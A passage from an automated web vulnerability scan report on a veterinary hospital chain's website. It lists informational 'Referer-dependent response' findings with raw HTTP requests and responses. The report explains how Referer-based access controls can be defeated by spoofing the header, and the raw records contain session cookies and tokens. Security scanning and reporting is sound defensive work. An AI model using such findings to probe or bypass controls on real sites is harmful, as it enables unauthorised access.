53faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d32a72466f5237a34daf28231fdde613d%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%25253faltphone%25253d%252526ampm1%25253dAM%252526ampm2%25253dAM%252526ampm3%25253dAM%252526appt_type%25253dappt%252526client%25253dcurrent%252526date1%25253d%252526date2%25253d%252526date3%25253d%252526doctor%25253d%252526email%25253d%252526fname%25253d%252526guid%25253d%252526ipaddress%25253d173.193.214
.243%252526lname%25253d%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526reason%25253d%252526referer%25253d%252526source%25253dnew-york-veterinary-hospital%252526submit%25253dRequest%25252bAn%25252bAppointment%252526time1%25253d%252526time2%25253d%252526time3%25253d%252526token%25253d69ad90c98185c3bfbf109c1ee7f2ceae%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fnew-york-veterinary-hospital%2525252fappt.html%2525253faltphone%2525253d%25252526ampm1%2525253dAM%25252526ampm2%2525253dAM%25252526ampm3%2525253dAM%25252526appt_type%2525253dappt%25252526client%2525253dcurrent%25252526date1%2525253d%25252526date2%2525253d%25252526date3%2525253d%25252526doctor%2525253d%25252526email%2525253d%25252526fname%2525253d%25252526guid%2525253d%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526reason%2525253d%25252526referer%2525253d%25252526source%2525253dnew-york-veterinary-hospital%25252526submit%2525253dRequest%2525252bAn%2525252bAppointment%25252526time1%2525253d%25252526time2%2525253d%25252526time3%2525253d%25252526token%2525253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fnew-york-veterinary-hospital%252525252fappt.html%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252b
NT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)% HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:45:40 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=ujbf7feteup2muqgmimolpdqs6; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 25455 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]...
6. Referer-dependent response
There are 5 instances of this issue:
Issue description
The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.
Common explanations for Referer-dependent responses include:
- Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
- Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
- Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.
Issue remediation
The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing. If the contents of responses are updated based on Referer data, then the same defences against malicious input should be employed here as for any other kind of user-supplied data.
6.1. http://www.vcahospitals.com/hanson/appt.html
Summary
Severity: Information
Confidence: Firm
Host: http://www.vcahospitals.com
Path: /hanson/appt.html
Request 1
GET /hanson/appt.html HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Referer: http://www.vcahospitals.com/hanson Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.18.10.1299326665
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:45:41 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 20870 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <input type="hidden" name="token" id="token" value="da3b15eadd9ef1b522fdccad42853c5c" /> <input type="hidden" name="referer" id="referer" value="http://www.vcahospitals.com/hanson" /> <input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/hanson/appt.html" /> <input type="hidden" name="ipaddress" id="ipaddress" value="173.193.214.243" /> <input type="hidden" name="useragent" id="useragent" value="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13" /> <input type="hidden" name="guid" id="guid" value="" /> <input type="hidden" name="source" id="source" value="hanson" /> <input type="hidden" name="appt_type" value="appt" /> </form> <p><span class="required"><strong>Important Notice:</strong></span><br />Do not use the appointment form in case of an emergency. Call us right away.</p><p>We will call you back to confirm your appointment within one business day during operating hours. Need to change your appointment? Just call us 24 hours before your scheduled time.</p><p>We respect your privacy and will not share your information with other parties. 
For more information, see the <a href="http://www.vcahospitals.com/hanson/privacy-policy.html" title="VCA Privacy Policy">VCA Privacy Policy</a>.</p> <!-- Google Website Optimizer Tracking Script --> <script type="text/javascript"> if(typeof(_gat)!='object')document.write('<sc'+'ript src="http'+ (document.location.protocol=='https:'?'s://ssl':'://www')+ '.google-analytics.com/ga.js"></sc'+'ript>')</script> <script type="text/javascript"> try { var gwoTracker=_gat._getTracker("UA-8482760-2"); gwoTracker._trackPageview("/1639539707/test"); }catch(err){}</script> <!-- End of Google Website Optimizer Tracking Script --> </div><!-- .content --> <div class="nav-page"> <h3>3 simple steps to set <br />up an appointment <br />for your pet:</h3> <div id="pictogram"><img src="http://www.vcahospitals.co...[SNIP]...
Request 2
GET /hanson/appt.html HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.18.10.1299326665
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:46:17 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 20836 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <input type="hidden" name="token" id="token" value="d06ff4a968334fca7610b3fb80c4f351" /> <input type="hidden" name="referer" id="referer" value="" /> <input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/hanson/appt.html" /> <input type="hidden" name="ipaddress" id="ipaddress" value="173.193.214.243" /> <input type="hidden" name="useragent" id="useragent" value="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13" /> <input type="hidden" name="guid" id="guid" value="" /> <input type="hidden" name="source" id="source" value="hanson" /> <input type="hidden" name="appt_type" value="appt" /> </form> <p><span class="required"><strong>Important Notice:</strong></span><br />Do not use the appointment form in case of an emergency. Call us right away.</p><p>We will call you back to confirm your appointment within one business day during operating hours. Need to change your appointment? Just call us 24 hours before your scheduled time.</p><p>We respect your privacy and will not share your information with other parties. 
For more information, see the <a href="http://www.vcahospitals.com/hanson/privacy-policy.html" title="VCA Privacy Policy">VCA Privacy Policy</a>.</p> <!-- Google Website Optimizer Tracking Script --> <script type="text/javascript"> if(typeof(_gat)!='object')document.write('<sc'+'ript src="http'+ (document.location.protocol=='https:'?'s://ssl':'://www')+ '.google-analytics.com/ga.js"></sc'+'ript>')</script> <script type="text/javascript"> try { var gwoTracker=_gat._getTracker("UA-8482760-2"); gwoTracker._trackPageview("/1639539707/test"); }catch(err){}</script> <!-- End of Google Website Optimizer Tracking Script --> </div><!-- .content --> <div class="nav-page"> <h3>3 simple steps to set <br />up an appointment <br />for your pet:</h3> <div id="pictogram"><img src="http://www.vcahospitals.com/hanson/image/hospital-main.jpg" ...[SNIP]...
6.2. http://www.vcahospitals.com/main/offer
Summary
Severity: Information
Confidence: Firm
Host: http://www.vcahospitals.com
Path: /main/offer
Request 1
GET /main/offer?&optin=1&guid=2505B0C6-B6AA-4144-878F-54873D353284 HTTP/1.1 Referer: http://www.vcahospitals.com/main/offer/thank-you.html? User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.vcahospitals.com Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6 Accept-Encoding: gzip, deflate
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:15:50 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 14427 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... <input type="hidden" name="token" id="token" value="120e7c22790ed42734da72210579f877" /> <input type="hidden" name="guid" id="guid" value="04BE5E58-E0C0-4263-A98D-0DE95E71916F" /> <input type="hidden" name="referer" id="referer" value="http://www.vcahospitals.com/main/offer/thank-you.html?" /> <input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/main/offer?&optin=1&guid=2505B0C6-B6AA-4144-878F-54873D353284" /> <input type="hidden" name="ipaddress" id="ipaddress" value="173.193.214.243" /> <input type="hidden" name="useragent" id="useragent" value="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" /> <input type="hidden" name="formtype" id="formtype" value="CORP" /> <input type="hidden" name="newmex" id="newmex" value="0" /> <input type="hidden" name="date" value="1307084400" /> <input type="hidden" name="tollfree" value="866-825-8416" /> </form> <p id="p-newmex"><span>Free initial health exam for new clients only. Not to be combined with any other offer. Not good toward boarding, grooming, prescription and non-prescription medication, and retail items. Not good toward emergency and/or specialty veterinary services. Coupon good for up to two pets (dogs or cats only) per household. Check with your nearest VCA hospital for other types of pets. Redeemable only at a general practice VCA Animal Hospital. 
<strong>Not valid in New Mexico.</strong> For pet owners who are aged 18 and older.</span> <span class="hidden">Complimentary initial health exam for new clients only. Not to be combined with any other offer. Not good toward boarding, grooming, prescription and non-prescription medication, and retail items. Not good toward emergency and/or specialty veterinary services. Coupon good for up to two pets (dogs or cats only) per household. Check with your nearest VCA hospital for other types of pets. Redeemable only at a general practice VCA Animal Hospital. For pet owners who are a...[SNIP]...
Request 2
GET /main/offer?&optin=1&guid=2505B0C6-B6AA-4144-878F-54873D353284 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.vcahospitals.com Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6 Accept-Encoding: gzip, deflate
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:16:02 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 14373 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... <input type="hidden" name="token" id="token" value="8ad122b6cac330ce58aeae1307770c96" /> <input type="hidden" name="guid" id="guid" value="5525091E-C2A5-4BDF-9EF4-DDEB8FA6F02A" /> <input type="hidden" name="referer" id="referer" value="" /> <input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/main/offer?&optin=1&guid=2505B0C6-B6AA-4144-878F-54873D353284" /> <input type="hidden" name="ipaddress" id="ipaddress" value="173.193.214.243" /> <input type="hidden" name="useragent" id="useragent" value="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" /> <input type="hidden" name="formtype" id="formtype" value="CORP" /> <input type="hidden" name="newmex" id="newmex" value="0" /> <input type="hidden" name="date" value="1307084400" /> <input type="hidden" name="tollfree" value="866-825-8416" /> </form> <p id="p-newmex"><span>Free initial health exam for new clients only. Not to be combined with any other offer. Not good toward boarding, grooming, prescription and non-prescription medication, and retail items. Not good toward emergency and/or specialty veterinary services. Coupon good for up to two pets (dogs or cats only) per household. Check with your nearest VCA hospital for other types of pets. Redeemable only at a general practice VCA Animal Hospital. <strong>Not valid in New Mexico.</strong> For pet owners who are aged 18 and older.</span> <span class="hidden">Complimentary initial health exam for new clients only. 
Not to be combined with any other offer. Not good toward boarding, grooming, prescription and non-prescription medication, and retail items. Not good toward emergency and/or specialty veterinary services. Coupon good for up to two pets (dogs or cats only) per household. Check with your nearest VCA hospital for other types of pets. Redeemable only at a general practice VCA Animal Hospital. For pet owners who are aged 18 and older.</span></p> <p><a href="#" id="a-...[SNIP]...
6.3. http://www.vcahospitals.com/main/offer/
Summary
Severity: Information
Confidence: Firm
Host: http://www.vcahospitals.com
Path: /main/offer/
Request 1
GET /main/offer/?&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1 Referer: http://www.vcahospitals.com/main/offer/thank-you.html? User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.vcahospitals.com Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6 Accept-Encoding: gzip, deflate
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:15:47 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 14620 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... <input type="hidden" name="token" id="token" value="d5ecc1c3a03e80630a5e977de6327e6b" /> <input type="hidden" name="guid" id="guid" value="7AB761AA-BB4E-4595-9EAD-6769D4B9ED93" /> <input type="hidden" name="referer" id="referer" value="http://www.vcahospitals.com/main/offer/thank-you.html?" /> <input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/main/offer/?&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F" /> <input type="hidden" name="ipaddress" id="ipaddress" value="173.193.214.243" /> <input type="hidden" name="useragent" id="useragent" value="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" /> <input type="hidden" name="formtype" id="formtype" value="CORP" /> <input type="hidden" name="newmex" id="newmex" value="0" /> <input type="hidden" name="date" value="1307084400" /> <input type="hidden" name="tollfree" value="866-825-8416" /> </form> <p id="p-newmex"><span>Free initial health exam for new clients only. Not to be combined with any other offer. Not good toward boarding, grooming, prescription and non-prescription medication, and retail items. Not good toward emergency and/or specialty veterinary services. Coupon good for up to two pets (dogs or cats only) per household. Check with your nearest VCA hospital for other types of pets. Redeemable only at a general practice VCA Animal Hospital. 
<strong>Not valid in New Mexico.</strong> For pet owners who are aged 18 and older.</span> <span class="hidden">Complimentary initial health exam for new clients only. Not to be combined with any other offer. Not good toward boarding, grooming, prescription and non-prescription medication, and retail items. Not good toward emergency and/or specialty veterinary services. Coupon good for up to two pets (dogs or cats only) per household. Check with your nearest VCA hospital for other types of pets. ...[SNIP]...
Request 2
GET /main/offer/?&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.vcahospitals.com Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6 Accept-Encoding: gzip, deflate
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:15:56 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 14566 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... <input type="hidden" name="token" id="token" value="20c0de32fbe87b3c8d9722a47a87717c" /> <input type="hidden" name="guid" id="guid" value="80BF4DBB-79D6-4BFF-8E38-11A178A784A9" /> <input type="hidden" name="referer" id="referer" value="" /> <input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/main/offer/?&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F" /> <input type="hidden" name="ipaddress" id="ipaddress" value="173.193.214.243" /> <input type="hidden" name="useragent" id="useragent" value="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" /> <input type="hidden" name="formtype" id="formtype" value="CORP" /> <input type="hidden" name="newmex" id="newmex" value="0" /> <input type="hidden" name="date" value="1307084400" /> <input type="hidden" name="tollfree" value="866-825-8416" /> </form> <p id="p-newmex"><span>Free initial health exam for new clients only. Not to be combined with any other offer. Not good toward boarding, grooming, prescription and non-prescription medication, and retail items. Not good toward emergency and/or specialty veterinary services. Coupon good for up to two pets (dogs or cats only) per household. Check with your nearest VCA hospital for other types of pets. Redeemable only at a general practice VCA Animal Hospital. 
<strong>Not valid in New Mexico.</strong> For pet owners who are aged 18 and older.</span> <span class="hidden">Complimentary initial health exam for new clients only. Not to be combined with any other offer. Not good toward boarding, grooming, prescription and non-prescription medication, and retail items. Not good toward emergency and/or specialty veterinary services. Coupon good for up to two pets (dogs or cats only) per household. Check with your nearest VCA hospital for other types of pets. Redeemable only at a general practice VCA Animal H...[SNIP]...
6.4. http://www.vcahospitals.com/main/offer/thank-you.html
Summary
Severity: Information
Confidence: Firm
Host: http://www.vcahospitals.com
Path: /main/offer/thank-you.html
Request 1
POST /main/offer/thank-you.html? HTTP/1.1 Referer: http://www.vcahospitals.com/main/offer/ User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.vcahospitals.com Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6 Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Content-Length: 522 fname=&lname=&addr=&city=&state=FL&zip=&phone=&email=&optin=on&pettype&other=&petname=&petage=&variant=&submit=Get+FREE+Coupon&token=8d1014910f5e3f05f9cdcf25a9c679bb&guid=EB9CB843-C06F-419A-A604-9D3CF...[SNIP]...
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:15:41 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 3579 Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... <a href="http://www.vcahospitals.com/main/offer/?&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F">Offer Form</a></p></div></div><!-- .content --><div class="nav-footer"> <ul> <li><a href="/main/directory.html" title="Other VCA Locations">Other VCA Locations</a></li><li>|</li> <li><a href="/main/charities.html" title="VCA Charities">VCA Charities</li><li>|</li> <li><a href="/main/about.php" title="About VCA">About VCA</a></li><li>|</li> <li><a href="/main/contact.php" title="Contact Us">Contact Us</a></li><li>|</li> <li><a href="/main/copyright.php" title="Copyright">Copyright</a></li><li>|</li> <li><a href="/main/privacy-policy.php" title="Privacy Policy">Privacy Policy</a></li><li>|</li> <li><a href="/main/sitemap.php" title="Site Map">Site Map</a></li> <li>|</li> <li><a href="http://www.facebook.com/VCAAnimalHospitals" target="_blank">Like us on Facebook <img src="/img/logo-facebook-like.png" style="vertical-align:bottom;" /></a></li> </ul> </div><!-- .nav-footer --></div><!-- .main --></div><!-- .body --> <div class="pop-layer"> <a href="javascript: void(0);" class="pop-close">close [x]</a> <div class="pop-content"></div> </div><!-- .pop-layer --> </div><!-- .wrapper --> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." 
: "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-8482760-1"); pageTracker._trackPageview(); } catch(err) {} </script> <div class="pop-shim"></div> <div class="pop-modal"> <a href="javascript: void(0);" class="pop-close">CLOSE</a> <div class="pop-content"></div> </div><!-- .pop-modal --> </body>
Request 2
POST /main/offer/thank-you.html? HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.vcahospitals.com Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6 Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Content-Length: 522 fname=&lname=&addr=&city=&state=FL&zip=&phone=&email=&optin=on&pettype&other=&petname=&petage=&variant=&submit=Get+FREE+Coupon&token=8d1014910f5e3f05f9cdcf25a9c679bb&guid=EB9CB843-C06F-419A-A604-9D3CF...[SNIP]...
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:17:33 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 3463 Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... <a href="?&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77">Offer Form</a></p></div></div><!-- .content --><div class="nav-footer"> <ul> <li><a href="/main/directory.html" title="Other VCA Locations">Other VCA Locations</a></li><li>|</li> <li><a href="/main/charities.html" title="VCA Charities">VCA Charities</li><li>|</li> <li><a href="/main/about.php" title="About VCA">About VCA</a></li><li>|</li> <li><a href="/main/contact.php" title="Contact Us">Contact Us</a></li><li>|</li> <li><a href="/main/copyright.php" title="Copyright">Copyright</a></li><li>|</li> <li><a href="/main/privacy-policy.php" title="Privacy Policy">Privacy Policy</a></li><li>|</li> <li><a href="/main/sitemap.php" title="Site Map">Site Map</a></li> <li>|</li> <li><a href="http://www.facebook.com/VCAAnimalHospitals" target="_blank">Like us on Facebook <img src="/img/logo-facebook-like.png" style="vertical-align:bottom;" /></a></li> </ul> </div><!-- .nav-footer --></div><!-- .main --></div><!-- .body --> <div class="pop-layer"> <a href="javascript: void(0);" class="pop-close">close [x]</a> <div class="pop-content"></div> </div><!-- .pop-layer --> </div><!-- .wrapper --> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." 
: "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-8482760-1"); pageTracker._trackPageview(); } catch(err) {} </script> <div class="pop-shim"></div> <div class="pop-modal"> <a href="javascript: void(0);" class="pop-close">CLOSE</a> <div class="pop-content"></div> </div><!-- .pop-modal --> </body>
6.5. http://www.vcahospitals.com/marshfield/appt.html
Summary
Severity: Information
Confidence: Firm
Host: http://www.vcahospitals.com
Path: /marshfield/appt.html
Request 1
